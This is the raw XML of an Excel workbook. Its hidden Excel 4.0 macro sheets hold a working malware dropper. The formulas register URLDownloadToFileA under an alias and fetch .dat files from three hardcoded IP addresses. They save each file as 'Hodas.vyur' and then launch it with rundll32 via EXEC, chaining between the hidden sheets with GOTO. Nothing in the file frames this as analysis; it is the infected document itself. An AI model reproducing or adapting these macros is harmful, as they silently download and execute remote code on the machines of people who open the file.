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1.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet2.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>
  <Override PartName="/xl/macrosheets/sheet3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ЭтаКнига"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="E:\Nowiy\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{C2CC4884-5FD5-4E08-8BAB-18FB2DE72ED6}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-108" yWindow="-108" windowWidth="20376" windowHeight="12360" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="Sheet" sheetId="9" r:id="rId1"/>
    <sheet name="Sheet1" sheetId="12" r:id="rId2"/>
    <sheet name="Brisk" sheetId="2" state="hidden" r:id="rId3"/>
    <sheet name="Jo" sheetId="6" state="hidden" r:id="rId4"/>
    <sheet name="Hi" sheetId="7" state="hidden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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="4" uniqueCount="4">
  <si>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uRlMon</t>
  </si>
  <si>
    <t>JJCCBB</t>
  </si>
  <si>
    <t>Belandes</t>
  </si>
  <si>
    <t>JJCCJJ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</si>
</sst>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6/relationships/xlMacrosheet" Target="macro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6/relationships/xlMacrosheet" Target="macrosheets/sheet3.xml"/><Relationship Id="rId4" Type="http://schemas.microsoft.com/office/2006/relationships/xlMacrosheet" Target="macrosheets/sheet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457200</xdr:colOff>
      <xdr:row>42</xdr:row>
      <xdr:rowOff>91440</xdr:rowOff>
    </xdr:to>
    <xdr:pic>
      <xdr:nvPicPr>
        <xdr:cNvPr id="4" name="pictures">
          <a:extLst>
            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF4F51ED-C21E-4725-8370-E78FC037E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0" cy="7772400"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
      </xdr:spPr>
    </xdr:pic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674A3FEE-4583-422B-936D-3862B5C011DB}">
  <dimension ref="CB266:CJ283"/>
  <sheetViews>
    <sheetView showFormulas="1" zoomScaleNormal="100" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="7.33203125" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="78" width="7.33203125" style="1"/>
    <col min="79" max="79" width="7.33203125" style="1" customWidth="1"/>
    <col min="80" max="85" width="7.33203125" style="1" hidden="1" customWidth="1"/>
    <col min="86" max="16384" width="7.33203125" style="1"/>
  </cols>
  <sheetData>
    <row r="266" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CD266" s="1">
        <f>NOW()</f>
        <v>44285.532789120371</v>
      </c>
    </row>
    <row r="267" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CD267" s="1" t="b">
        <f>NOW()=NOW()=NOW()=FORMULA("URLDownloadToFileA",CE271)</f>
        <v>1</v>
      </c>
    </row>
    <row r="268" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CC268" s="1" t="str">
        <f>CONCATENATE(CC274,CD266,CC273)</f>
        <v>http://45.150.67.244/44285,5327891204.dat</v>
      </c>
    </row>
    <row r="269" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CC269" s="1" t="str">
        <f>CONCATENATE(CC275,CD266,CC273)</f>
        <v>http://195.123.210.248/44285,5327891204.dat</v>
      </c>
      <c r="CD269" s="1" t="b">
        <f>NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE269,CE273,,1,9)</f>
        <v>1</v>
      </c>
      <c r="CE269" s="1" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="270" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CC270" s="1" t="str">
        <f>CONCATENATE(CC276,CD266,CC273)</f>
        <v>http://91.211.91.69/44285,5327891204.dat</v>
      </c>
      <c r="CD270" s="1" t="b">
        <f>NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE272,CE273,,1,9)</f>
        <v>1</v>
      </c>
      <c r="CE270" s="1" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="271" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CD271" s="1" t="e">
        <f>NOW()=NOW()=NOW()=Belandes(0,CC268,"..\Hodas.vyur",0,0)</f>
        <v>#NAME?</v>
      </c>
    </row>
    <row r="272" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CD272" s="1" t="e">
        <f>NOW()=NOW()=NOW()=Belandes(0,CC269,"..\Hodas.vyur1",0,0)</f>
        <v>#NAME?</v>
      </c>
      <c r="CE272" s="1" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="273" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CC273" s="1" t="str">
        <f>".dat"</f>
        <v>.dat</v>
      </c>
      <c r="CD273" s="1" t="e">
        <f>NOW()=NOW()=NOW()=Belandes(0,CC270,"..\Hodas.vyur2",0,0)</f>
        <v>#NAME?</v>
      </c>
      <c r="CE273" s="1" t="s">
        <v>2</v>
      </c>
    </row>
    <row r="274" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CC274" s="1" t="str">
        <f>"http://45.150.67.244/"</f>
        <v>http://45.150.67.244/</v>
      </c>
    </row>
    <row r="275" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CC275" s="1" t="str">
        <f>"http://195.123.210.248/"</f>
        <v>http://195.123.210.248/</v>
      </c>
    </row>
    <row r="276" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CC276" s="1" t="str">
        <f>"http://91.211.91.69/"</f>
        <v>http://91.211.91.69/</v>
      </c>
    </row>
    <row r="280" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CD280" s="1" t="b">
        <f>NOW()=NOW()=NOW()=EXEC("rundll32 "&amp;"..\Hodas.vyur"&amp;",PluginInit")</f>
        <v>1</v>
      </c>
    </row>
    <row r="283" spans="81:83" x14ac:dyDescent="0.3">
      <c r="CD283" s="1" t="e">
        <f>GOTO(Jo!E4)</f>
        <v>#N/A</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1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627EEF39-4B44-4490-9264-EA5BF8C1B6B9}">
  <dimension ref="E6:E8"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="7.6640625" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="16384" width="7.6640625" style="1"/>
  </cols>
  <sheetData>
    <row r="6" spans="5:5" x14ac:dyDescent="0.3">
      <c r="E6" s="1" t="b">
        <f>EXEC("rundll32 "&amp;"..\Hodas.vyur1"&amp;",PluginInit")</f>
        <v>0</v>
      </c>
    </row>
    <row r="8" spans="5:5" x14ac:dyDescent="0.3">
      <c r="E8" s="1" t="e">
        <f>GOTO(Hi!D4)</f>
        <v>#N/A</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1"/>
</xm:macrosheet>
</file>

<file path=xl/macrosheets/sheet3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72067F03-3C2F-409F-9206-0552CD863068}">
  <dimension ref="D6:D11"/>
  <sheetViews>
    <sheetView showFormulas="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultColWidth="7.5546875" defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="16384" width="7.5546875" style="1"/>
  </cols>
  <sheetData>
    <row r="6" spans="4:4" x14ac:dyDescent="0.3">
      <c r="D6" s="1" t="b">
        <f>EXEC("rundll32 "&amp;"..\Hodas.vyur2"&amp;",PluginInit")</f>
        <v>0</v>
      </c>
    </row>
    <row r="11" spans="4:4" x14ac:dyDescent="0.3">
      <c r="D11" s="1" t="b">
        <f>HALT()</f>
        <v>0</v>
      </c>
    </row>
  </sheetData>
  <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
  <pageSetup paperSize="9" orientation="portrait" r:id="rId1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BE95-3ACA-4FE7-BCE4-C3A7164C4334}">
  <sheetPr codeName="Лист1"/>
  <dimension ref="A1"/>
  <sheetViews>
    <sheetView tabSelected="1" workbookViewId="0"/>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="16384" width="8.8867187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C0724-B418-4824-86AA-9646FF27D92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Макросы Excel 4.0</vt:lpstr>
      </vt:variant>
      <vt:variant>
        <vt:i4>3</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="5" baseType="lpstr">
      <vt:lpstr>Sheet</vt:lpstr>
      <vt:lpstr>Sheet1</vt:lpstr>
      <vt:lpstr>Brisk</vt:lpstr>
      <vt:lpstr>Jo</vt:lpstr>
      <vt:lpstr>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Rabota</dc:creator>
  <cp:lastModifiedBy>Feriola</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-05T18:19:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-04-01T11:59:42Z</dcterms:modified>
</cp:coreProperties>
</file>